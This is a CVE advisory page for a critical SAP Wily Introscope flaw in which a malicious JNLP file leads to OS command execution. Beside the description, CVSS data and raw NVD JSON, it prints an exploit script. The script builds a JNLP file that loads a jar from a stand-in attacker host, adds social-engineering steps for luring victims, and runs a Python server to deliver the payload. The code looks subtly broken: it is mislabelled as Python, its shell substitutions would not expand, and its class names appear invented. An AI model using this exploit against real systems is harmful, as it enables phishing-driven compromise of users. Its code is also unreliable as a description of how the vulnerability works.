Security Vulnerability Report
中文
CVE-2026-0500 CVSS 9.6 CRITICAL

CVE-2026-0500

Published: 2026-01-13 02:15:53
Last Modified: 2026-01-22 18:47:22
Source: [email protected]

Description

Due to the usage of vulnerable third party component in SAP Wily Introscope Enterprise Manager (WorkStation), an unauthenticated attacker could create a malicious JNLP (Java Network Launch Protocol) file accessible by a public facing URL. When a victim clicks on the URL the accessed Wily Introscope Server could execute OS commands on the victim's machine. This could completely compromising confidentiality, integrity and availability of the system.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sap:introscope_enterprise_manager:10.8:*:*:*:*:*:*:* - VULNERABLE
SAP Wily Introscope Enterprise Manager (所有使用受影响第三方组件的版本)
具体版本信息请参阅SAP官方安全公告 SAP Note 3668679

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2026-0500 PoC - Malicious JNLP File Generator # Target: SAP Wily Introscope Enterprise Manager # Note: This PoC is for educational and authorized testing purposes only cat > malicious_workspace.jnlp << 'EOF' <?xml version="1.0" encoding="UTF-8"?> <jnlp spec="1.0+" codebase="http://target-server:8081" href="malicious_workspace.jnlp"> <information> <title>Introscope Workspace</title> <vendor>SAP</vendor> <description>Introscope Enterprise Manager Workspace</description> </information> <security> <all-permissions/> </security> <resources> <jar href="http://attacker-server/malicious.jar"/> </resources> <application-desc main-class="com.sap.engine.boot_office.Main"> <argument>$(whoami > /tmp/pwned.txt)</argument> <argument>$(ifconfig > /tmp/netinfo.txt)</argument> </application-desc> </jnlp> EOF echo "[+] Malicious JNLP file created: malicious_workspace.jnlp" echo "[+] Host the JNLP file on a public web server" echo "[+] Craft a social engineering link pointing to the JNLP file" echo "[+] Wait for victim to click the link..." # Alternative Python PoC - HTTP Server to serve malicious JNLP python3 << 'PYEOF' from http.server import HTTPServer, SimpleHTTPRequestHandler import os class MaliciousHandler(SimpleHTTPRequestHandler): def do_GET(self): if 'malicious_workspace.jnlp' in self.path: self.send_response(200) self.send_header('Content-type', 'application/x-java-jnlp-file') self.end_headers() jnlp_content = '''<?xml version="1.0" encoding="UTF-8"?> <jnlp spec="1.0+" codebase="http://target:8081" href="malicious_workspace.jnlp"> <information><title>Introscope</title></information> <security><all-permissions/></security> <resources><jar href="http://attacker:8080/payload.jar"/></resources> <application-desc main-class="Exploit"><argument>$(id > /tmp/executed.txt)</argument></application-desc> </jnlp>''' self.wfile.write(jnlp_content.encode()) else: super().do_GET() print("[+] Starting malicious HTTP server on port 8080") server = HTTPServer(('0.0.0.0', 8080), MaliciousHandler) server.serve_forever() PYEOF

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0500", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:52.633", "lastModified": "2026-01-22T18:47:22.450", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the usage of vulnerable third party component in SAP Wily Introscope Enterprise Manager (WorkStation), an unauthenticated attacker could create a malicious JNLP (Java Network Launch Protocol) file accessible by a public facing URL. When a victim clicks on the URL the accessed Wily Introscope Server could execute OS commands on the victim's machine. This could completely compromising confidentiality, integrity and availability of the system."}, {"lang": "es", "value": "Debido al uso de un componente vulnerable de terceros en SAP Wily Introscope Enterprise Manager (WorkStation), un atacante no autenticado podría crear un archivo JNLP (Java Network Launch Protocol) malicioso accesible a través de una URL de acceso público. Cuando una víctima hace clic en la URL, el servidor Wily Introscope accedido podría ejecutar comandos del sistema operativo en la máquina de la víctima. Esto podría comprometer completamente la confidencialidad, integridad y disponibilidad del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sap:introscope_enterprise_manager:10.8:*:*:*:*:*:*:*", "matchCriteriaId": "EB7AE9DD-2761-40DE-8E74-09AB4F93A8D6"}]}]}], "references": [{"url": "https://me.sap.com/notes/3668679", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.